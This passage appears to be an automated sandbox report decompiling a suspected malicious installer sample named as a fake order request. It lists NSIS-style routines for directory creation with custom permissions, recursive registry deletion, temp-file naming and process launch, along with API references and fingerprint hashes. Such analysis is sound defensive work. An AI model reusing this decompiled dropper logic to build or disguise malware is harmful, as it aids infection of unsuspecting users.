				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				/* Builds an absolute security descriptor whose owner/group SID (0x4083b0) and DACL (0x4083a0)
				   are fixed data in the image, then creates the directory with it instead of the default ACL. */
				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083b0;
				_v36.Group = 0x4083b0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;                      /* SECURITY_DESCRIPTOR_REVISION */
				_v36.Control = 4;                       /* SE_DACL_PRESENT */
				_v36.Dacl = 0x4083a0;
				_v16.nLength = 0xc;                     /* sizeof(SECURITY_ATTRIBUTES) on 32-bit */
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {                      /* ERROR_ALREADY_EXISTS: re-apply the descriptor to the existing directory */
					/* 0x80000007 = OWNER | GROUP | DACL | PROTECTED_DACL_SECURITY_INFORMATION, so inherited ACEs are discarded */
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;                            /* any other CreateDirectoryW error code */
			}


                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user~1\AppData\Local\Temp\), ref: 004056A3
                                                • GetLastError.KERNEL32 ref: 004056B7
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056CC
                                                • GetLastError.KERNEL32 ref: 004056D6
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405686
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 3449924974-2382934351
                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                • Instruction ID: a656050947ebfef5167fdf4c2b21dc35e266e59b00d64b4b83911e60c27c7584
                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                • Instruction Fuzzy Hash: 94010871D00619EBEF019FA0C9087EFBBB8EB14314F10443AD549B6280E77996148FA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
			E00402BFF(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;                 /* subkey name buffer, 0x105 WCHARs */
				long _t18;
				intOrPtr* _t27;
				long _t28;

				/* Recursively deletes the key _a8 under _a4. When _a12 != 0 nothing is deleted:
				   the function only returns 1 if the key has at least one subkey. */
				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x7a8af0 | 0x00000008,  &_v8); // executed, 0x8 = KEY_ENUMERATE_SUB_KEYS plus the view flag at 0x7a8af0
				if(_t18 == 0) {
					/* the index stays 0 because each iteration deletes the subkey it just enumerated */
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402BFF(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406408(3);     /* import resolved at runtime; the indirect call below has the shape of RegDeleteKeyExW(hKey, lpSubKey, samDesired, Reserved) */
					if(_t27 == 0) {
						if( *0x7a8af0 != 0) { /* an alternate registry view was requested but cannot be honoured without that import */
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x7a8af0, 0);
				}
				return _t18;
			}


                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
                                                • Instruction ID: 96ecc02dbfbaaadde43e4edb48da855e10ebdec385bf1e19a14d4c4ac13e51f4
                                                • Opcode Fuzzy Hash: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
                                                • Instruction Fuzzy Hash: 4E116A72904119BFEF109F90DF8CEAE3B79FB54384B10403AF906A10A0D7B48E55AA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				struct HINSTANCE__* _t34;
                                                				intOrPtr _t38;
                                                				void* _t44;
                                                				void* _t45;
                                                				void* _t46;
                                                				void* _t50;
                                                				intOrPtr _t53;
                                                				signed int _t57;
                                                				signed int _t61;
                                                				void* _t65;
                                                				void* _t66;
                                                				void* _t70;
                                                				void* _t74;
                                                
                                                				_t74 = __esi;
                                                				_t66 = __edi;
                                                				_t65 = __edx;
                                                				 *0x1000406c = _a8;
                                                				 *0x10004070 = _a16;
                                                				 *0x10004074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                				_push(1); // executed
                                                				_t34 = E10001B18(); // executed
                                                				_t50 = _t34;
                                                				if(_t50 == 0) {
                                                					L28:
                                                					return _t34;
                                                				} else {
                                                					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                						E10002286(_t50);
                                                					}
                                                					_push(_t50);
                                                					E100022D0(_t65);
                                                					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                					if(_t53 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                								_t34 = E100024A9(_t50);
                                                							} else {
                                                								_push(_t74);
                                                								_push(_t66);
                                                								_t12 = _t50 + 0x1018; // 0x1018
                                                								_t57 = 8;
                                                								memcpy( &_v36, _t12, _t57 << 2);
                                                								_t38 = E100015B4(_t50);
                                                								_t15 = _t50 + 0x1018; // 0x1018
                                                								_t70 = _t15;
                                                								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                								 *_t70 = 4;
                                                								E100024A9(_t50);
                                                								_t61 = 8;
                                                								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                							}
                                                						} else {
                                                							E100024A9(_t50);
                                                							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                						}
                                                						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                							_t34 = E1000246C(_t50);
                                                							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                								_t34 =  *(_t50 + 0x1008);
                                                								if(_t34 != 0) {
                                                									_t34 = FreeLibrary(_t34);
                                                								}
                                                							}
                                                							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                								_t34 = E1000153D( *0x10004068);
                                                							}
                                                						}
                                                						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t50);
                                                						}
                                                					}
                                                					_t44 =  *_t50;
                                                					if(_t44 == 0) {
                                                						if(_t53 != 1) {
                                                							goto L14;
                                                						}
                                                						E10002B5F(_t50);
                                                						L12:
                                                						_t50 = _t44;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t45 = _t44 - 1;
                                                					if(_t45 == 0) {
                                                						L8:
                                                						_t44 = E100028A4(_t53, _t50); // executed
                                                						goto L12;
                                                					}
                                                					_t46 = _t45 - 1;
                                                					if(_t46 == 0) {
                                                						E10002645(_t50);
                                                						goto L13;
                                                					}
                                                					if(_t46 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D83
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D88
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D8D
                                                • GlobalFree.KERNEL32 ref: 10001804
                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                • GlobalFree.KERNEL32 ref: 100018A0
                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32 ref: 100015CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                • String ID:
                                                • API String ID: 1791698881-3916222277
                                                • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E00401BDF() {
                                                				signed int _t28;
                                                				WCHAR* _t31;
                                                				long _t32;
                                                				int _t37;
                                                				signed int _t38;
                                                				int _t42;
                                                				int _t48;
                                                				struct HWND__* _t52;
                                                				void* _t55;
                                                
                                                				 *(_t55 - 0x14) = E00402BA2(3);
                                                				 *(_t55 + 8) = E00402BA2(4);
                                                				if(( *(_t55 - 0x18) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x14)) = E00402BBF(0x33);
                                                				}
                                                				__eflags =  *(_t55 - 0x18) & 0x00000002;
                                                				if(( *(_t55 - 0x18) & 0x00000002) != 0) {
                                                					 *(_t55 + 8) = E00402BBF(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t55 - 0x30)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t50 = E00402BBF();
                                                					_t28 = E00402BBF();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t31 =  ~( *_t27) & _t50;
                                                					__eflags = _t31;
                                                					_t32 = FindWindowExW( *(_t55 - 0x14),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
                                                					goto L10;
                                                				} else {
                                                					_t52 = E00402BA2();
                                                					_t37 = E00402BA2();
                                                					_t48 =  *(_t55 - 0x18) >> 2;
                                                					if(__eflags == 0) {
                                                						_t32 = SendMessageW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8));
                                                						L10:
                                                						 *(_t55 - 8) = _t32;
                                                					} else {
                                                						_t38 = SendMessageTimeoutW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - _t42;
                                                				if( *((intOrPtr*)(_t55 - 0x2c)) >= _t42) {
                                                					_push( *(_t55 - 8));
                                                					E00405F79();
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t55 - 4));
                                                				return 0;
                                                			}

                                                APIs
                                                • SendMessageTimeoutW.USER32 ref: 00401C3F
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
                                                • Instruction ID: 0a841d9a538a1c78525c7c746850703aa7529d4a1cc505f1b812f839afa95e13
                                                • Opcode Fuzzy Hash: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
                                                • Instruction Fuzzy Hash: 4B219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B88A409B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                 			E00405EFF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
                                                 				long _t20;
                                                 				long _t23;
                                                 				long _t24;
                                                 				char* _t26;
                                                 
                                                 				asm("sbb eax, eax"); // @0x00405f0f
                                                 				_t26 = _a16; // @0x00405f11
                                                 				 *_t26 = 0; // @0x00405f1e
                                                 				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed @0x00405f29
                                                 				if(_t20 == 0) { // @0x00405f31
                                                 					_a8 = 0x800; // @0x00405f36
                                                 					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed @0x00405f4a
                                                 					if(_t23 != 0 || _a16 != 1 && _a16 != 2) { // @0x00405f52
                                                 						 *_t26 = 0; // @0x00405f60
                                                 					} // @0x00405f60
                                                 					_t26[0x7fe] = 0; // @0x00405f66
                                                 					_t24 = RegCloseKey(_a20); // executed @0x00405f6d
                                                 					return _t24; // @0x00000000
                                                 				} // @0x00405f6d
                                                 				return _t20; // @0x00405f76
                                                 			}

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,ExecToStack,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405F29
                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405F4A
                                                • RegCloseKey.KERNELBASE(?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405F6D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: ExecToStack
                                                • API String ID: 3677997916-166031814
                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction ID: 550e653c67ea0eb77a08417ddc9dcc7927ab5f79673ec66d03fd3a0aafaa2bf7
                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction Fuzzy Hash: AC015A3110020AEACF218F26ED08EDB3BACEF88350F00403AF844D2260D774D964DBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                 			E00405C36(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                 				intOrPtr _v8;
                                                 				short _v12;
                                                 				short _t12;
                                                 				intOrPtr _t13;
                                                 				signed int _t14;
                                                 				WCHAR* _t17;
                                                 				signed int _t19;
                                                 				signed short _t23;
                                                 				WCHAR* _t26;
                                                 
                                                 				_t26 = _a4; // @0x00405c3c
                                                 				_t23 = 0x64; // @0x00405c42
                                                 				while(1) { // @0x00405c43
                                                 					_t12 =  *L"nsa"; // 0x73006e @0x00405c43
                                                 					_t23 = _t23 - 1; // @0x00405c48
                                                 					_v12 = _t12; // @0x00405c49
                                                 					_t13 =  *0x40a574; // 0x61 @0x00405c4c
                                                 					_v8 = _t13; // @0x00405c51
                                                 					_t14 = GetTickCount(); // @0x00405c54
                                                 					_t19 = 0x1a; // @0x00405c5e
                                                 					_v8 = _v8 + _t14 % _t19; // @0x00405c6b
                                                 					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed @0x00405c6f
                                                 					if(_t17 != 0) { // @0x00405c77
                                                 						break; // @0x00000000
                                                 					} // @0x00000000
                                                 					if(_t23 != 0) { // @0x00405c7b
                                                 						continue; // @0x00000000
                                                 					} else { // @0x00405c7d
                                                 						 *_t26 =  *_t26 & _t23; // @0x00405c7d
                                                 					} // @0x00405c7d
                                                 					L4: // @0x00405c80
                                                 					return _t17; // @0x00405c83
                                                 				} // @0x00405c83
                                                 				_t17 = _t26; // @0x00405c86
                                                 				goto L4; // @0x00000000
                                                 			}

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405C54
                                                • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040327B,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00405C6F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3083371207
                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                • Instruction ID: 8a35e51ea0d0ee70ea5c20e8edce62ba12a10af59c8f3d63fe044a56b3f339a6
                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                • Instruction Fuzzy Hash: 99F06276600704BFEB008B55DD05E9F77A8EB91750F10403AED00F7140E6B09A548B58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                 			E0040639C(intOrPtr _a4) {
                                                 				short _v576;
                                                 				signed int _t13;
                                                 				struct HINSTANCE__* _t17;
                                                 				signed int _t19;
                                                 				void* _t24;
                                                 
                                                 				_t13 = GetSystemDirectoryW( &_v576, 0x104); // @0x004063b3
                                                 				if(_t13 > 0x104) { // @0x004063bc
                                                 					_t13 = 0; // @0x004063be
                                                 				} // @0x004063be
                                                 				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) { // @0x004063c2
                                                 					_t19 = 1; // @0x004063d5
                                                 				} else { // @0x004063cf
                                                 					_t19 = 0; // @0x004063cf
                                                 				} // @0x004063cf
                                                 				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4); // @0x004063ee
                                                 				_t17 = LoadLibraryW( &_v576); // executed @0x004063fe
                                                 				return _t17; // @0x00406405
                                                 			}

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
                                                • wsprintfW.USER32 ref: 004063EE
                                                • LoadLibraryW.KERNELBASE(?), ref: 004063FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll
                                                • API String ID: 2200240437-2744773210
                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                • Instruction ID: 2cc1e6addeffa93896351747fd2b076c866e84041b4f9c80d347ce7491f0a061
                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                • Instruction Fuzzy Hash: 6CF0BB70510129D7DB14AB64EE0DD9B366CEB00305F11447BA946F10D1FBBCDA69CBE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                 			E00401E66() {
                                                 				void* _t16;
                                                 				long _t20;
                                                 				void* _t25;
                                                 				void* _t32;
                                                 
                                                 				_t29 = E00402BBF(_t25); // @0x00401e6c
                                                 				E00405191(0xffffffeb, _t14); // @0x00401e71
                                                 				_t16 = E00405712(_t29); // executed @0x00401e77
                                                 				 *(_t32 + 8) = _t16; // @0x00401e7e
                                                 				if(_t16 == _t25) { // @0x00401e81
                                                 					 *((intOrPtr*)(_t32 - 4)) = 1; // @0x0040281e
                                                 				} else { // @0x00401e87
                                                 					if( *((intOrPtr*)(_t32 - 0x24)) != _t25) { // @0x00401e8a
                                                 						_t20 = WaitForSingleObject(_t16, 0x64); // @0x00401e95
                                                 						while(_t20 == 0x102) { // @0x00401eac
                                                 							E00406444(0xf); // @0x00401ea0
                                                 							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64); // @0x00401eaa
                                                 						} // @0x00401eaa
                                                 						GetExitCodeProcess( *(_t32 + 8), _t32 - 8); // @0x00401eb7
                                                 						if( *((intOrPtr*)(_t32 - 0x28)) < _t25) { // @0x00401ec0
                                                 							if( *(_t32 - 8) != _t25) { // @0x00401ed2
                                                 								 *((intOrPtr*)(_t32 - 4)) = 1; // @0x00401ed4
                                                 							} // @0x00401ed4
                                                 						} else { // @0x00401ec2
                                                 							E00405F79( *((intOrPtr*)(_t32 - 0x10)),  *(_t32 - 8)); // @0x00401ec8
                                                 						} // @0x00401ec8
                                                 					} // @0x00401ec0
                                                 					_push( *(_t32 + 8)); // @0x00401edb
                                                 					CloseHandle(); // @0x00401ede
                                                 				} // @0x00401ede
                                                 				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t32 - 4)); // @0x00402a4f
                                                 				return 0; // @0x00402a5b
                                                 			}

                                                APIs
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                  • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                  • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                  • Part of subcall function 00405712: CreateProcessW.KERNELBASE ref: 0040573B
                                                  • Part of subcall function 00405712: CloseHandle.KERNEL32(0040A300), ref: 00405748
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                • GetExitCodeProcess.KERNEL32 ref: 00401EB7
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
                                                • Instruction ID: d208eef208ec2c6f5187e880842865a00525bcfa3f2a05837fac4e2667901554
                                                • Opcode Fuzzy Hash: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
                                                • Instruction Fuzzy Hash: F911C431A00508EBCF20AF91CD859AE7BB2EF40314F24403BF501B61E1C7798A91DB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000), ref: 10002963
                                                • GetLastError.KERNEL32 ref: 10002A6A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID: @M)w
                                                • API String ID: 1214770103-1211491014
                                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
